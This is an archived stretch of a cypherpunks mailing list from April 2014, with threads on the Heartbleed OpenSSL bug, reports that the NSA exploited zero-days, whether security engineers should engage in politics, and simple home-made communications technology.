https://www.usenix.org/conference/usenixsecurity10/grid-phd-smart-grid-cyber-security-and-future-keeping-lights From decoy at iki.fi Sun Apr 13 14:29:21 2014 From: decoy at iki.fi (Sampo Syreeni) Date: Mon, 14 Apr 2014 00:29:21 +0300 (EEST) Subject: [cryptome] snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> Message-ID: On 2014-04-13, Robert Hettinga wrote: >> Hettinga's offshore dark pool of smegma > > It was ever thus. ...and we are Legion. -- Sampo Syreeni, aka decoy - decoy at iki.fi, http://decoy.iki.fi/front +358-40-3255353, 025E D175 ABE5 027C 9494 EEB0 E090 8BA9 0509 85C2 From jamesdbell9 at yahoo.com Mon Apr 14 00:46:03 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Mon, 14 Apr 2014 00:46:03 -0700 (PDT) Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug Message-ID: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> White House, spy agencies deny NSA exploited 'Heartbleed' bug  photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on Friday neither the National Security Agency nor any other part of the government were aware before this month of the "Heartbleed" bug, denying a report that the spy agency exploited the glitch in widely used Web encryption technology to gather intelligence. The White House, the NSA and the Office of the Director of National Intelligence issued statements after Bloomberg reported that the NSA was aware of the bug for at least two years and exploited it in order to obtain passwords and other basic information used in hacking operations. The Bloomberg report cited two unnamed sources it said were familiar with the matter. The Heartbleed bug is considered one of the most serious Internet security flaws to be uncovered in recent years. "Reports that NSA or any other part of the government were aware of the so-called Heartbleed vulnerability before April 2014 are wrong," White House National Security Council spokeswoman Caitlin Hayden said in a statement. "This administration takes seriously its responsibility to help maintain an open, interoperable, secure and reliable Internet," Hayden added. Bloomberg was not immediately available to comment. The discovery of Heartbleed by researchers with Google Inc and a small security firm, Codenomicon, prompted the U.S. Homeland Security Department to advise businesses on Tuesday to review their servers to see if they were using vulnerable versions of widely used software known as OpenSSL. OpenSSL is used to encrypt email and other communications and to protect the websites of big Internet companies, including Facebook Inc, Google Inc and Yahoo Inc. The bug, disclosed Monday, allows hackers to steal data without a trace. NSA spokeswoman Vanee Vines said in a separate statement: "NSA was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private-sector cybersecurity report." Hayden said the federal government relies on OpenSSL to protect the privacy of users of government websites and other online services. "If the federal government, including the intelligence community, had discovered this vulnerability prior to last week, it would have been disclosed to the community responsible for OpenSSL," Hayden added. Hayden said that when U.S. agencies discover a new vulnerability in commercial and open-source software, "it is in the national interest to responsibly disclose the vulnerability rather than to hold it for an investigative or intelligence purpose." Such vulnerabilities are known as "zero-day" flaws because the software developers have had zero days to fix them. In December, a five-member advisory panel convened to review electronic surveillance policy urged the White House to sharply curtail the use of undisclosed flaws and stop undercutting encryption standards. The panel included former White House cybersecurity advisor Richard Clarke. In late February, a senior White House official said the Obama administration was intensively studying both issues. The administration statements issued on Friday confirmed that the review had already "reinvigorated an interagency process for deciding when to share vulnerabilities" on a case-by-case basis. The activities of the NSA have come under sharp scrutiny since former agency contractor Edward Snowden leaked numerous documents exposing expansive U.S. surveillance efforts. Even before Snowden's emergence, former officials, including Clarke, told Reuters that offensive and spying considerations had dominated inside the NSA, causing it to withhold information instead of warning the public about new flaws. Clarke told Reuters Friday that the NSA had not known of Heartbleed. The U.S. government warned banks and other businesses on Friday to be on alert for hackers seeking to steal data exposed by the bug, as a German programmer who volunteered with OpenSSL took responsibility for inadvertently launching the security crisis. (Additional reporting by Joseph Menn; Editing by Jonathan Oatis) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 6824 bytes Desc: not available URL: From guninski at guninski.com Sun Apr 13 21:22:00 2014 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 14 Apr 2014 07:22:00 +0300 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? In-Reply-To: <534b203b.4771ec0a.5517.6908@mx.google.com> References: <20140413135352.GA2487@sivokote.iziade.m$> <534b203b.4771ec0a.5517.6908@mx.google.com> Message-ID: <20140414042200.GA2560@sivokote.iziade.m$> On Sun, Apr 13, 2014 at 08:41:33PM +0000, Linux User wrote: > On Sun, 13 Apr 2014 07:08:27 -0700 > coderman wrote: > > > On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski > > wrote: > > > AFAICT the list archives don't show in search engines > > > and in addition don't see /robots.txt. > > > > > > How so? > > > > back when traffic was handled on the al-qaeda.net domain, indexing by > > western search engines was considered to be "material support to > > Al-qaeda"... > > > > now they've just forgotten to undo their filters. > > > > ;) > > > > https://www.google.com/search?q=test+site%3Acpunks.org%2Fpipermail%2Fcypherpunks%2F > > > the archives are indeed indexed? search on google for: Heartbleed site:cpunks.org/pipermail/cypherpunks/ doesn't return anything for me. (and searching for openssl doesn't return anything from 2014 for me). From juan.g71 at gmail.com Mon Apr 14 00:26:30 2014 From: juan.g71 at gmail.com (Linux User) Date: Mon, 14 Apr 2014 10:26:30 +0300 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? In-Reply-To: <20140414042200.GA2560@sivokote.iziade.m$> References: <20140413135352.GA2487@sivokote.iziade.m$> <534b203b.4771ec0a.5517.6908@mx.google.com> <20140414042200.GA2560@sivokote.iziade.m$> Message-ID: <534b8dbd.7082ec0a.6788.ffffd651@mx.google.com> On Mon, 14 Apr 2014 07:22:00 +0300 Georgi Guninski wrote: > > > > https://www.google.com/search?q=test+site%3Acpunks.org%2Fpipermail%2Fcypherpunks%2F > > > > > > the archives are indeed indexed? > > search on google for: > > Heartbleed site:cpunks.org/pipermail/cypherpunks/ > > doesn't return anything for me. > > (and searching for openssl doesn't return > anything from 2014 for me). Hm, you're right. Seems that the indexing stopped at some point in 2013.... > > From hozer at hozed.org Mon Apr 14 08:46:43 2014 From: hozer at hozed.org (Troy Benjegerdes) Date: Mon, 14 Apr 2014 10:46:43 -0500 Subject: a speech In-Reply-To: <20140414014632.6BA012280D8@palinka.tinho.net> References: <20140414014632.6BA012280D8@palinka.tinho.net> Message-ID: <20140414154642.GT3180@nl.grid.coop> On Sun, Apr 13, 2014 at 09:46:32PM -0400, dan at geer.org wrote: > > Thanks for the note and the compliment. > > I took Kelly Ziegler at her word (*) given that her role as an executive > at NERC (Northamerican Electric Reliability Corporation). > > --dan > > (*) > https://www.usenix.org/conference/usenixsecurity10/grid-phd-smart-grid-cyber-security-and-future-keeping-lights > I would advise any cypherpunk that wants to keep their lights on to invest in a 48VDC system with (partial) battery backup. If your solar installer starts blathering about AC and inverters and batteries costing too much, get a new installer, or help me build some open-source hardware grid-tie inverters. If you have a say 5KW system, installers will try to sell you batteries to back up the entire 5kw. You only need a few hundred watts (and maybe 1 kilowatt-hour) of batteries. If you do it this way, it will cost less than buying electricity for the next 30 years. If there is a high-profile hack of some power grid device and utilities have to do a 'truck roll' to patch some magic utility box, then your solar payback time will probably drop to 5 years because you have to pay for the utilities insecurity. From guninski at guninski.com Mon Apr 14 02:09:00 2014 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 14 Apr 2014 12:09:00 +0300 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <20140414090900.GB2560@sivokote.iziade.m$> I am not fan of NSA, but suspect they exploited code execution much more than just reading. >From the openssl-1 Changelog, these appear more severe than HB to me. (some of these certainly affect 0.9 branch). *) Make openssl verify return errors. [Chris Palmer and Ben Laurie] *) Sanity check record length before skipping explicit IV in TLS 1.2, 1.1 and DTLS to fix DoS attack. *) Initialise tkeylen properly when encrypting CMS messages. Thanks to Solar Designer of Openwall for reporting this issue. *) Check for potentially exploitable overflows in asn1_d2i_read_bio BUF_mem_grow and BUF_mem_grow_clean. Refuse attempts to shrink buffer in CRYPTO_realloc_clean. On Mon, Apr 14, 2014 at 12:46:03AM -0700, jim bell wrote: > White House, spy agencies deny NSA exploited 'Heartbleed' bug  > photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on Friday neither the National Security Agency nor any other part of the government were aware before this month of the "Heartbleed" bug, denying a report that the spy agency exploited the glitch in widely used Web encryption technology to gather intelligence. > The White House, the NSA and the Office of the Director of National Intelligence issued statements after Bloomberg reported that the NSA was aware of the bug for at least two years and exploited it in order to obtain passwords and other basic information used in hacking operations. The Bloomberg report cited two unnamed sources it said were familiar with the matter. > The Heartbleed bug is considered one of the most serious Internet security flaws to be uncovered in recent years. > "Reports that NSA or any other part of the government were aware of the so-called Heartbleed vulnerability before April 2014 are wrong," White House National Security Council spokeswoman Caitlin Hayden said in a statement. > "This administration takes seriously its responsibility to help maintain an open, interoperable, secure and reliable Internet," Hayden added. > Bloomberg was not immediately available to comment. > The discovery of Heartbleed by researchers with Google Inc and a small security firm, Codenomicon, prompted the U.S. Homeland Security Department to advise businesses on Tuesday to review their servers to see if they were using vulnerable versions of widely used software known as OpenSSL. > OpenSSL is used to encrypt email and other communications and to protect the websites of big Internet companies, including Facebook Inc, Google Inc and Yahoo Inc. The bug, disclosed Monday, allows hackers to steal data without a trace. > NSA spokeswoman Vanee Vines said in a separate statement: "NSA was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private-sector cybersecurity report." > Hayden said the federal government relies on OpenSSL to protect the privacy of users of government websites and other online services. "If the federal government, including the intelligence community, had discovered this vulnerability prior to last week, it would have been disclosed to the community responsible for OpenSSL," Hayden added. > Hayden said that when U.S. agencies discover a new vulnerability in commercial and open-source software, "it is in the national interest to responsibly disclose the vulnerability rather than to hold it for an investigative or intelligence purpose." Such vulnerabilities are known as "zero-day" flaws because the software developers have had zero days to fix them. > In December, a five-member advisory panel convened to review electronic surveillance policy urged the White House to sharply curtail the use of undisclosed flaws and stop undercutting encryption standards. The panel included former White House cybersecurity advisor Richard Clarke. > In late February, a senior White House official said the Obama administration was intensively studying both issues. > The administration statements issued on Friday confirmed that the review had already "reinvigorated an interagency process for deciding when to share vulnerabilities" on a case-by-case basis. > The activities of the NSA have come under sharp scrutiny since former agency contractor Edward Snowden leaked numerous documents exposing expansive U.S. surveillance efforts. > Even before Snowden's emergence, former officials, including Clarke, told Reuters that offensive and spying considerations had dominated inside the NSA, causing it to withhold information instead of warning the public about new flaws. > Clarke told Reuters Friday that the NSA had not known of Heartbleed. > The U.S. government warned banks and other businesses on Friday to be on alert for hackers seeking to steal data exposed by the bug, as a German programmer who volunteered with OpenSSL took responsibility for inadvertently launching the security crisis. > (Additional reporting by Joseph Menn; Editing by Jonathan Oatis) From guninski at guninski.com Mon Apr 14 04:17:57 2014 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 14 Apr 2014 14:17:57 +0300 Subject: Obama allows NSA to exploit 0-days: report Message-ID: <20140414111757.GC2560@sivokote.iziade.m$> http://www.theregister.co.uk/2014/04/14/obama_allows_nsa_to_exploit_0days_report/ Obama allows NSA to exploit 0-days: report ==== President Obama considered what the NSA should do if it becomes aware of a vulnerability that could help its activities. His decision led to the creation of “... a broad exception for 'a clear national security or law enforcement need'.” ==== m$ gives the nsa steady amount of their 0days (admitted), not counting the backdoors. From gizmoguy1 at gmail.com Mon Apr 14 09:49:27 2014 From: gizmoguy1 at gmail.com (John Preston) Date: Mon, 14 Apr 2014 17:49:27 +0100 Subject: Home-made communications and security technology Message-ID: <1397494167.2004.10.camel@localhost.localdomain> Given the enormous complexity of modern technology (100+ KLOC software projects, 1+ billion transistor CPUs, etc.) I view security failures to be an inevitability: the attack surface is rich for exploitation by enemies, and bugs and errors constantly emerge due to both man and machine. That said, I do not think it unwise to consider it a prerequisite for the most paranoid-level technologies that they be easily understandable and scrutinisable by individual people. Hence, I have an interest in pen-and-paper ciphers, simple wireless communications systems for Morse, voice, and data, and simple computers. Is this something other people think is a sensible or important line of inquiry? Do these technologies and the people using them exist? Are there movements advocating this approach? Thank you. From juan.g71 at gmail.com Mon Apr 14 15:15:08 2014 From: juan.g71 at gmail.com (Juan) Date: Mon, 14 Apr 2014 19:15:08 -0300 Subject: NSA good guys In-Reply-To: <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> References: <534691BD.1060904@cathalgarvey.me> <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> Message-ID: <534c5df2.671fec0a.5e1a.fffff958@mx.google.com> On Mon, 14 Apr 2014 22:08:29 +0200 tpb-crypto at laposte.net wrote: > > However, all their technical expertise exists to > > achieve some political goals. And when you look at the > > political beliefs of these people, you see that they suck big > > time. As engineers they may be competent, but there's a step > > above engineering, and there, they fail. > > > > Since when politics is a "step above" anything? Politicians are the > lowest of the low thugs and thus so is their art of thievery. Indeed. And what I'm getting at is that there are people in the 'security' industry who either consider politicians and the state to be a 'necessary evil', or worse, think that politicians and the political system they serve, are A Good Thing. In a nearby mailing list, there are a bunch of people who are funded by the american military(psycho killers) to create a so called 'anomity network'. Regardless of how good they are at writing code, their political beliefs are sick garbage. They operate on the laughable premise that they are the 'good guys' Same people who, when called out on the source of their funding have one argument : "you're a tinfoil conspiracy theorist!" (Wait, of course, that's not an argument, just puerile name-calling) So, I didn't mean that politicians are above engineers. I mean that political beliefs and understanding of political theory are more important than crypto knowledge. When a guy comes along quoting thomas jefferson and the like, rest assured he's part of the problem. From rysiek at hackerspace.pl Mon Apr 14 11:20:32 2014 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 14 Apr 2014 20:20:32 +0200 Subject: NSA good guys In-Reply-To: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> Message-ID: <1898095.3HPr8ppers@lap> Dnia niedziela, 13 kwietnia 2014 20:32:18 Linux User pisze: > On Sun, 13 Apr 2014 01:28:14 +0200 > > Lodewijk andré de la porte wrote: > > So. Are the NSA guys good guys? Well. They're the enemy of the > > people, as they invade their privacy and therewith their safety. If > > you can be blackmailed, studied, influenced, etc. you are weak and > > vulnerable. Preaching to the choir, I guess. > > Well, I get the impression that some of the voices of this > choir still need some preaching directed at them =P > > > I noticed something interesting in digital 'security' > circles. People who deal with 'security' are, at first sight, > technical people and are concerned with issues such as > factoring integers, permutations, routing protocols, etc. > etc. etc. > > However, all their technical expertise exists to > achieve some political goals. And when you look at the > political beliefs of these people, you see that they suck big > time. As engineers they may be competent, but there's a step > above engineering, and there, they fail. This is so true. The "I'm not into politics, I just write code" stance needs to change. It *does* matter for whom you write your code and how you future-proof it from being use to abuse people. Simple example: dear sysadmins (of whom I am one), do you *really* need all those logs? They are a treasure-trove for LEAs. Unless you are required by law, just keep the last week or so, that's usually enough to debug problems as they arise. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Mon Apr 14 11:24:33 2014 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 14 Apr 2014 20:24:33 +0200 Subject: Obama allows NSA to exploit 0-days: report In-Reply-To: <20140414111757.GC2560@sivokote.iziade.m$> References: <20140414111757.GC2560@sivokote.iziade.m$> Message-ID: <6723214.SG909br3NP@lap> Dnia poniedziałek, 14 kwietnia 2014 14:17:57 Georgi Guninski pisze: > http://www.theregister.co.uk/2014/04/14/obama_allows_nsa_to_exploit_0days_re > port/ > > Obama allows NSA to exploit 0-days: report > (...) Well... http://rys.io/en/134 -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From nathan at squimp.com Mon Apr 14 12:05:45 2014 From: nathan at squimp.com (Nathan Andrew Fain) Date: Mon, 14 Apr 2014 21:05:45 +0200 Subject: Obama allows NSA to exploit 0-days: report In-Reply-To: <20140414111757.GC2560@sivokote.iziade.m$> References: <20140414111757.GC2560@sivokote.iziade.m$> Message-ID: <534C3189.2060907@squimp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The argument from the administration, NSA or any other channel holds no water. Quiet simply if the NSA thinks responsible disclosure is the way to go where are the 0days they have disclosed? On 14/04/2014 13:17, Georgi Guninski wrote: > http://www.theregister.co.uk/2014/04/14/obama_allows_nsa_to_exploit_0days_report/ > > > > Obama allows NSA to exploit 0-days: report > > ==== President Obama considered what the NSA should do if it > becomes aware of a vulnerability that could help its activities. > His decision led to the creation of “... a broad exception for 'a > clear national security or law enforcement need'.” ==== > > m$ gives the nsa steady amount of their 0days (admitted), not > counting the backdoors. > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iEYEARECAAYFAlNMMYkACgkQveagdEkPM4AyIgCg3RkdI1DEuShfRnCdcVdFhInG wrgAnjdV5cfjQAyVXNR70kgPVxNcA/yI =HOOm -----END PGP SIGNATURE----- From tpb-crypto at laposte.net Mon Apr 14 13:08:29 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Mon, 14 Apr 2014 22:08:29 +0200 Subject: NSA good guys In-Reply-To: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> References: <534691BD.1060904@cathalgarvey.me> <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> Message-ID: <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> > Message du 14/04/14 02:01 > De : "Linux User" > > > > So. Are the NSA guys good guys? Well. They're the enemy of the > > people, as they invade their privacy and therewith their safety. If > > you can be blackmailed, studied, influenced, etc. you are weak and > > vulnerable. Preaching to the choir, I guess. > > Well, I get the impression that some of the voices of this > choir still need some preaching directed at them =P > > I noticed something interesting in digital 'security' > circles. People who deal with 'security' are, at first sight, > technical people and are concerned with issues such as > factoring integers, permutations, routing protocols, etc. > etc. etc. > > However, all their technical expertise exists to > achieve some political goals. And when you look at the > political beliefs of these people, you see that they suck big > time. As engineers they may be competent, but there's a step > above engineering, and there, they fail. > Since when politics is a "step above" anything? Politicians are the lowest of the low thugs and thus so is their art of thievery. From tpb-crypto at laposte.net Mon Apr 14 13:34:33 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Mon, 14 Apr 2014 22:34:33 +0200 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> > Message du 14/04/14 10:17 > De : "jim bell" > White House, spy agencies deny NSA exploited 'Heartbleed' bug  > photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on [...] And how about the heartbleed being used past year against freenode? Who would use a zero-day against freenode if not spy agencies? Are they seriously thinking anybody will believe such a denial? lol From jamesdbell9 at yahoo.com Mon Apr 14 23:35:10 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Mon, 14 Apr 2014 23:35:10 -0700 (PDT) Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> Message-ID: <1397543710.18220.YahooMailNeo@web126206.mail.ne1.yahoo.com> From: "tpb-crypto at laposte.net" > Message du 14/04/14 10:17 > De : "jim bell" > White House, spy agencies deny NSA exploited 'Heartbleed' bug  > photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on [...] >And how about the heartbleed being used past year against freenode? Who would use a zero-day against >freenode if not spy agencies? >Are they seriously thinking anybody will believe such a denial? lol I would think that at some point, the NSA would become too embarrassed to admit that they HADN'T discovered and employed such an exploit! Which leads me to a question:  Presumably, the NSA has billions of emails locked up in Utah, or wherever they had previously used as a data-store.  Does the revelation of the Heartbleed bug mean that the NSA could have quickly logged onto millions of accounts, read emails in the clear, etc?           Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2039 bytes Desc: not available URL: From rysiek at hackerspace.pl Mon Apr 14 14:57:16 2014 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 14 Apr 2014 23:57:16 +0200 Subject: NSA good guys In-Reply-To: <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> Message-ID: <1603449.SJ9FqTUdKW@lap> Dnia poniedziałek, 14 kwietnia 2014 22:08:29 tpb-crypto at laposte.net pisze: > > Message du 14/04/14 02:01 > > De : "Linux User" > > > > > So. Are the NSA guys good guys? Well. They're the enemy of the > > > people, as they invade their privacy and therewith their safety. If > > > you can be blackmailed, studied, influenced, etc. you are weak and > > > vulnerable. Preaching to the choir, I guess. > > > > Well, I get the impression that some of the voices of this > > choir still need some preaching directed at them =P > > > > I noticed something interesting in digital 'security' > > circles. People who deal with 'security' are, at first sight, > > technical people and are concerned with issues such as > > factoring integers, permutations, routing protocols, etc. > > etc. etc. > > > > However, all their technical expertise exists to > > achieve some political goals. And when you look at the > > political beliefs of these people, you see that they suck big > > time. As engineers they may be competent, but there's a step > > above engineering, and there, they fail. > > Since when politics is a "step above" anything? Politicians are the lowest > of the low thugs and thus so is their art of thievery. There are two main meanings of the term "politics". The one you are referring to is the "pardon-less, dirty fight for power", and is the reason many describe themselves as "apolitical". The other is the classical "of, for, or relating to citizens": http://en.wikipedia.org/wiki/Politics This is the one I and the parent spoke about. It is not about the temporary/current power struggle, but about the general *policies* regarding... well, anything, really. For example, the fact that Deric Lostutter faces more jailtime than rapists he exposed: http://politicalblindspot.com/he-exposed-steubenville-now-what/ ...is a direct effect of hackers not engaging in politics (in the second sense). And a great exemplification of the good old "regardless of whether or not you are interested in politics, politics *will* get interested in you, eventually" rule. I despise the first version of "politics"; I firmly stand on the position we have to start engaging in the second version, though. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From nymble at gmail.com Tue Apr 15 00:52:33 2014 From: nymble at gmail.com (nymble) Date: Tue, 15 Apr 2014 00:52:33 -0700 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> References: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com> <1180870710.49045.1397507673676.JavaMail.www@wwinf8305> Message-ID: <02A63D1F-D387-4CD7-85CB-F1299522B632@gmail.com> >> White House, spy agencies deny NSA exploited 'Heartbleed' bug >> photoSecurity experts warn there is little Internet users can do to protect themselve\WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on [...] > > And how about the heartbleed being used past year against freenode? Who would use a zero-day against freenode if not spy agencies? > > Are they seriously thinking anybody will believe such a denial? lol There are other three letter agencies in the world …. BND (Bundesnachrichtendienst) is more likely than NSA as primary instigator. From damico at dcon.com.br Mon Apr 14 21:08:03 2014 From: damico at dcon.com.br (Jose Damico) Date: Tue, 15 Apr 2014 01:08:03 -0300 Subject: Home-made communications and security technology In-Reply-To: <1397494167.2004.10.camel@localhost.localdomain> References: <1397494167.2004.10.camel@localhost.localdomain> Message-ID: <534CB0A3.4050702@dcon.com.br> I think, that one important and simple tool that will remain useful for the next decades is Analog Audio Encryption. Radio & Analog communications are simple to implement and very useful for good and for bad, but I think that what will keep this technology live for situations, like wars, conflicts, protests etc, will be the use of Audio Encryption over Radio & Analog communications. Best Regards Yap On 04/14/2014 01:49 PM, John Preston wrote: > Given the enormous complexity of modern technology (100+ KLOC software > projects, > 1+ billion transistor CPUs, etc.) I view security failures to be an > inevitability: the attack surface is rich for exploitation by enemies, > and bugs and errors constantly emerge due to both man and machine. > > That said, I do not think it unwise to consider it a prerequisite for > the most paranoid-level technologies that they be easily understandable > and scrutinisable by individual people. Hence, I have an interest in > pen-and-paper ciphers, simple wireless communications systems for Morse, > voice, and data, and simple computers. > > Is this something other people think is a sensible or important line of > inquiry? Do these technologies and the people using them exist? Are > there movements advocating this approach? Thank you. > From tpb-crypto at laposte.net Mon Apr 14 19:23:25 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Tue, 15 Apr 2014 04:23:25 +0200 Subject: NSA good guys In-Reply-To: <534c5df2.671fec0a.5e1a.fffff958@mx.google.com> References: <534691BD.1060904@cathalgarvey.me> <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <534c5df2.671fec0a.5e1a.fffff958@mx.google.com> Message-ID: <877505804.55836.1397528605646.JavaMail.www@wwinf8315> > Message du 15/04/14 00:46 > De : "Juan" > > So, I didn't mean that politicians are above engineers. I mean > that political beliefs and understanding of political theory > are more important than crypto knowledge. > A few years ago, I was studying timezones to link them to geolocation databases and get an approximation of the correct timezone customers would be using a certain service, that was to be used to sync clocks and plan backups for low traffic hours. If you had the displeasure of doing this kind of job once, you are certain to get hit by the fact that politicians make a point of messing with time standards just to meet "political goals", like bosses that change desks' places just to make the office "more like their style", like dogs pissing on lampposts. That is kind of primitive monkey behavior, I think many of you share this feeling. I find such stupid capricious behavior is not worthy of respect and the people who do it, not worthy of their positions. There is no way of respecting any of them, since they are no better than dogs, by acting that way. It is bad when a boss does it, but it is much worse when a politician does such things. Sharing my frustration, a guy in a forum said these wise words, more or less: - 300 years ago we got rid of the influence of religion, so humanity could advance. Now the time for the politicians is up. The current stage of the internet crypto is the same as the current stage of NASA going to Mars. We won't even get to low Earth orbit if we don't shed the weight of so many stakeholders - not to call them parasites so directly. Either we get back to the roots and do nimble and usable things - that a human can understand and manage alone - or we won't go anywhere. I agree it is wise we understand politics, just to work around them. From tpb-crypto at laposte.net Mon Apr 14 19:46:15 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Tue, 15 Apr 2014 04:46:15 +0200 Subject: NSA good guys In-Reply-To: <1603449.SJ9FqTUdKW@lap> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap> Message-ID: <972157717.55906.1397529975026.JavaMail.www@wwinf8315> > Message du 15/04/14 01:00 > De : "rysiek" > > For example, the fact that Deric Lostutter faces more jailtime than rapists he > exposed: > http://politicalblindspot.com/he-exposed-steubenville-now-what/ > > ...is a direct effect of hackers not engaging in politics (in the second > sense). And a great exemplification of the good old "regardless of whether or > not you are interested in politics, politics *will* get interested in you, > eventually" rule. > One could argue that laws which punish hacking as a higher offense than rape is a byproduct of stupid politicians scared by technology which they don't have any understanding of. As an instance, there are countries in which probing a systems' vulnerabilities gives you jail time, you doing a port scan is a criminal offense depending on your citizenship. This arks back to my argument that politics is nowadays nothing more than religion was a few centuries ago. There was a time priests would throw holy water against locomotives because them howling machines were surely hiding some kind of devil in their bellies. Politicians not understanding what technology is about, just throw all the police they can at it. The results of that are things like the cameras in London and that huge NSA datacenter in Utah. From dan at geer.org Tue Apr 15 05:42:25 2014 From: dan at geer.org (dan at geer.org) Date: Tue, 15 Apr 2014 08:42:25 -0400 Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug In-Reply-To: Your message of "Tue, 15 Apr 2014 00:52:33 PDT." <02A63D1F-D387-4CD7-85CB-F1299522B632@gmail.com> Message-ID: <20140415124225.90DA72280BF@palinka.tinho.net> nymble writes: > There are other three letter agencies in the world. BND > (Bundesnachrichtendienst) is more likely than NSA as primary The number of people in China working over open source is larger than anywhere else and by a lot. Granted, automation (in the West) may beat massed manual labor (in the East), but for me and thee the differences in method seem not to matter in the short run. --dan From drwho at virtadpt.net Tue Apr 15 10:58:08 2014 From: drwho at virtadpt.net (The Doctor) Date: Tue, 15 Apr 2014 10:58:08 -0700 Subject: Obama allows NSA to exploit 0-days: report In-Reply-To: <534C3189.2060907@squimp.com> References: <20140414111757.GC2560@sivokote.iziade.m$> <534C3189.2060907@squimp.com> Message-ID: <534D7330.7090600@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/14/2014 12:05 PM, Nathan Andrew Fain wrote: > The argument from the administration, NSA or any other channel > holds no water. If the NSA - one of whose observed tasks is pwning everything and everyone - does NOT have at least a small cadre monitoring F/OSS projects for 0-days to stockpile, then somebody is asleep at the switch. This seems like too big a pie full of juicy vulnerabilities to not have a couple of digits in. - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Sendmail isn't evil, it's job security. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNNczAACgkQO9j/K4B7F8HFWQCglkU4ntTFsJTI3wE2fM7ImvuJ ztAAn3Ri0WnrSKXCiJMZt9MjbAfciX1x =ro1P -----END PGP SIGNATURE----- From drwho at virtadpt.net Tue Apr 15 11:03:18 2014 From: drwho at virtadpt.net (The Doctor) Date: Tue, 15 Apr 2014 11:03:18 -0700 Subject: NSA good guys In-Reply-To: <972157717.55906.1397529975026.JavaMail.www@wwinf8315> References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> 